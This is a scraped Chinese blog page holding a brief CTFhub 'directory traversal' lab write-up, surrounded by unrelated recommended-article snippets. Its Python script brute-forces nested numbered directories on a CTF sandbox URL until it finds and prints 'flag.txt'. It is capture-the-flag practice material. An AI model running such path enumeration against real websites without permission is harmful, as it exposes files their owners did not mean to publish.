2021-07-06

最新推荐文章于 2025-03-17 15:48:33 发布
最新推荐文章于 2025-03-17 15:48:33 发布
阅读量129 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Loser_LOSERdyh/article/details/118512904
版权
该博客介绍了如何通过Python进行目录遍历攻击,以寻找目标网站中的敏感文件`flag.txt`。作者使用了`requests`库,通过双重循环对URL的子目录进行穷举,当找到包含`flag.txt`的页面时,进一步请求该文件内容并打印出来。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CTFhub 目录遍历
先点进去看了下目录,有两层,所以直接暴力循环

import requests
def nb():
    url = "http://challenge-cd17494c9655b07d.sandbox.ctfhub.com:10800/flag_in_here/"
    for i in range(1, 5):
        for j in range(1, 5):
            gg=url + str(i) + "/" + str(j)
            find = requests.get(url + str(i) + "/" + str(j))
            find.encoding = "utf-8"
            if "flag.txt" in find.text:
                print(requests.get(gg+"/flag.txt").text)
                return
nb()
2021-07-28
lixiaoxianer的博客
07-28 4192
kubeadmin 安装k8s1.20集群 标签(空格分隔): kubernetes架构系列 一:k8s1.20.x 的重要更新 二:k8s1.20.x 的安装 2.1 :高可用Kubernetes集群规划 2.2 yum 的更新配置 (所有节点全部安装) 一:k8s1.20.x 的重要更新 1、Kubectl debug 设置一个临时容器 2、Sidecar 3、Volume:更改目录权限,fsGroup 4、ConfigMap和Secret K8S官网:https://kubernetes.io/
log-aggregated-2021-07-28-080657.ips
07-28
log-aggregated-2021-07-28-080657.ips
2021-07-18 Debug
Choulongx的博客
07-18 572
今天发现了一个低级错误 [Error] ld returned 1 exit status 回去查发现是写错了主函数名称 我是sb
2021-06-07~2021-06-11总结(MySQL)
weixin_43160903的博客
06-13 1607
2021-06-07~2021-06-11工作总结工作内容技术探索1.浅谈MySQL1.1 MySQL的引擎1.1.1 InnoDBInnoDB行锁模式及加锁方式:1.1.2 MyisamMyISAM只有表锁,且没有事务。1.1.3 MySQL的锁机制1.1.4 MySQL 的 B+Tree1.2 数据类型:1.2.1 数值类型:1.2.2 字符串类型:1.2.3 时间日期类型:总结 工作总结 工作内容 本周的工作内容主要是对之前所实现功能的bug进行修改,主要的问题为三个平台之间流程、权限。这就要求在最初
时间转换(js将 “2021-07-06T06:23:57.000+00:00” 转换为年月日时分秒)
强者惜字如金,弱者废话连篇!
11-23 6955
时间转换(js将 “2021-07-06T06:23:57.000+00:00” 转换为年月日时分秒) //时间转换(js将 “2021-07-06T06:23:57.000+00:00” 转换为年月日时分秒) function transformTimestamp(timestamp) { let a = new Date(timestamp).getTime(); const date = new Date(a); const Y = date.getFullYear() + '-';
CVE-2021-4034漏洞复现
qq_75161850的博客
03-17 1307
该漏洞是 Linux 系统中 Polkit 组件的 pkexec 工具存在的本地权限提升漏洞,也被称为。
2021-07-06常见面试题整理
rabies的博客
07-06 922
http和https的区别? 安全,HTTPS是身披SSL外壳的HTTP,利用SSL/TLS建立全信道,加密数据包 http和https的区别 http和https区别(详细) C++虚函数的原理 https://leetcode-cn.com/leetbook/read/cpp-interview-highlights/efvzbt/ C++智能指针 函数结束时自动释放内存空间,不需要手动释放内存空间 std::auto_ptr 具有排他所有权的性质,意思是赋值或者复制都会改变所有权 ..
2021-01-18
weixin_54641072的博客
01-18 1994
找程序猿哥哥!!!!编制App或者小程序
2021-03-15
weixin_44902539的博客
03-15 1367
好网站 https://blog.youkuaiyun.com/u013317445/article/details/88196373?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-6.control&dist_request_id=1328641.48931.16157665162059593&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-
2021-01-04
wubaoyu123的博客
01-04 2394
博客园Logo 首页 新闻 博问 专区 闪存 班级 代码改变世界 搜索 注册 登录 返回主页 知了一笑 博客园 首页 新随笔 联系 订阅 管理 数据仓库组件:Hive环境搭建和基础用法 本文源码:GitHub || GitEE 一、Hive基础简介 1、基础描述 Hive是基于Hadoop的一个数据仓库工具,用来进行数据提取、转化、加载,是一个可以对Hadoop中的大规模存储的数据进行查询和分析存储的组件,Hive数据仓库工具能将结构化的数据文件映射为一张数据库表,并提供SQL查询功能,能将SQL语句转变成
2021-01-10
qq_22667507的博客
01-10 1127
jupyter notebook中直接安装python的第三方库。 例如安装pymysql : ! pip install pymysql。 升级pip:
139PushMail_inhouse.cpu_resource-2021-07-06-214001.ips
09-21
139PushMail_inhouse.cpu_resource-2021-07-06-214001.ips
华为电脑管家2021-06-07.zip
06-07
包含华为官网电脑管家10.1.2.33版、11.1.1.95版安装包;华为电脑管家安装工具(PCManagerMgr)和口令、还有帮助说明pdf文档;该资料来自:https://www.52pojie.cn/thread-1453159-1-1.html
MQ2BasedDetect.SchDoc copy_2021-07-06.schdoc
07-06
MQ2烟雾传感电路原理图
智慧医院管理案例-医院智慧运维一体化平台应用[2021-07-06](47页).pdf
05-26
智慧医院管理案例-医院智慧运维一体化平台应用[2021-07-06](47页).pdf
C++面试干货---带你梳理常考的面试题(二).docx
06-16
C++面试干货---带你梳理常考的面试题(二).docx
乐谱符号转码:CTF中MIDI事件的时值到ASCII转换.pdf
06-16
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 从隐写术到编码转换,从音频隐写到文件结构分析,CTF-Misc 教会你用技术的眼睛发现数据中的「彩蛋」。掌握 Stegsolve、CyberChef、Audacity 等工具,合法破解摩斯密码、二维码、LSB 隐写,在虚拟战场中提升网络安全意识与技术能力。记住:所有技术仅用于学习与竞赛!
上市公司-全要素生产率1999-2024年.xlsx
最新发布
06-16
数据名称:上市公司全要素生产率+dofile5种测算 数据范围:上市公司 时间范围:1999-2024年 有效样本:59722条 数据来源:上市公司年报 数据整理:内含原始数据、测算结果和dofile 更新时间:2025年5月 更多说明:含OLS、FE、LP、OP、GMM 5种TFP测算方法
PP-OCRv5-mobile-cls-onnx.onnx
06-16
PP-OCRv5_mobile_cls_onnx.onnx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值